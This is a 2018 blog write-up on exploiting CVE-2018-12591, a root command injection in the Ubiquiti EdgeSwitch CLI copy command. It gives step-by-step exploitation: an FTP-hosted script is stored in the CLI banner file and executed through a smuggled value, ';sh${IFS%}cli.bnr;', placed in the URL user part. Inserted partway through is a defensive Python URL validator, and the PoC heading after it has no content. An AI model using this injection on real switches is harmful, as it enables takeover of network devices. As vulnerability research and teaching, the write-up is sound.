June 21, 2018

Exploiting CVE-2018-12591

Yesterday I managed to get my first two CVEs, one of which is CVE-2018-12591. This is a writeup of how this vulnerability can be exploited. Although it’s not the most complicated vulnerability to exploit, it might still be helpful for those wishing to learn. As always, this is intended for purely educational purposes.

So a brief summary of the vulnerability:

It’s possible to execute arbitrary commands as root by injecting into the user part of the FTP/TFTP URL given to the copy command. This is because the FTP user details are put directly into an OS command for FTP/TFTP without proper filtering.
The EdgeSwitch differs from other Ubiquiti products: whereas the EdgeRouter and ToughSwitch provide full SSH access, the EdgeSwitch only presents a minimal CLI.

Although the administrator credentials are required, exploiting this vulnerability allows the attacker to break out of the restricted CLI and elevate their privileges beyond what the administrator themselves can obtain, taking full control of the switch, possibly without the administrator ever knowing.
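The root cause described above (URL user details spliced into an OS command, guarded only by filtering a few characters) is best fixed by an allowlist plus a shell-free exec. The following is an added Python example, not Ubiquiti's code: it validates each part of a copy URL against an allowlist and builds an argv list so that no shell ever sees the user part. The curl backend, the allowlist patterns and the function names are assumptions for this example.

```python
import re
from urllib.parse import urlsplit

# Allowlists (constructed for this example). Anything outside them is rejected
# outright, so quoting tricks, $IFS substitutions or ';' separators cannot slip by.
_USER_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")
_HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")
_PATH_RE = re.compile(r"/[A-Za-z0-9._/-]{1,255}")


class UnsafeCopyUrl(ValueError):
    """Raised when a copy URL contains anything outside the allowlists."""


def parse_copy_url(url: str) -> dict:
    """Split an ftp:// or tftp:// URL into user/host/path and validate each part."""
    parts = urlsplit(url)
    if parts.scheme not in ("ftp", "tftp"):
        raise UnsafeCopyUrl(f"unsupported scheme {parts.scheme!r}")
    # urlsplit ends the userinfo at the last '@', so a ';' or '$' placed in the
    # user part lands in `username` and fails the allowlist below.
    user = parts.username or "anonymous"
    host = parts.hostname or ""
    path = parts.path or ""
    for name, value, pattern in (("user", user, _USER_RE),
                                 ("host", host, _HOST_RE),
                                 ("path", path, _PATH_RE)):
        if not pattern.fullmatch(value):
            raise UnsafeCopyUrl(f"rejected {name} part: {value!r}")
    return {"scheme": parts.scheme, "user": user, "host": host, "path": path}


def build_copy_argv(url: str, dest: str) -> list:
    """Return an argv list for subprocess.run(argv) without shell=True: each
    component is exactly one argument and nothing is reinterpreted by sh."""
    p = parse_copy_url(url)
    # Hypothetical backend: curl's real --user/--output flags stand in for the
    # switch's own fetch tool, which the write-up does not name.
    return ["curl", "--silent", "--user", p["user"], "--output", dest,
            f"{p['scheme']}://{p['host']}{p['path']}"]


def is_safe_copy_url(url: str) -> bool:
    """Audit helper for CLI logs: False for any URL the validator would reject."""
    try:
        parse_copy_url(url)
    except ValueError:  # UnsafeCopyUrl and urlsplit's own ValueErrors
        return False
    return True
```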

Exploitation:

Although some characters are filtered (forward slashes and spaces, and there seem to be a fair few other nuances as well), techniques can be used to write a minimal payload around the filters. An example bypassing these filters is shown below.

PoC for creating a file called ‘a’ with the root directory listing in it:

Advanced Exploitation:

As you can see, this is quite a chaotic way of writing payloads and won’t be particularly helpful for more complicated commands.

Luckily for us there is an alternative way of executing a payload. We use the CLI Banner (/mnt/fastpath/cli.bnr) file as a store for our script and then execute it directly.

  • Set up an FTP server.
  • Create a file called malicious with your bash script in it.
  • Telnet/SSH into the CLI.
  • Enable privileged mode.
  • Type copy ftp://<Your FTP Username>@<Your FTP Server IP>/malicious nvram:clibanner
  • Type copy nvram:log ftp://;sh${IFS%}cli.bnr;@fake.com/a/b in order to execute the script.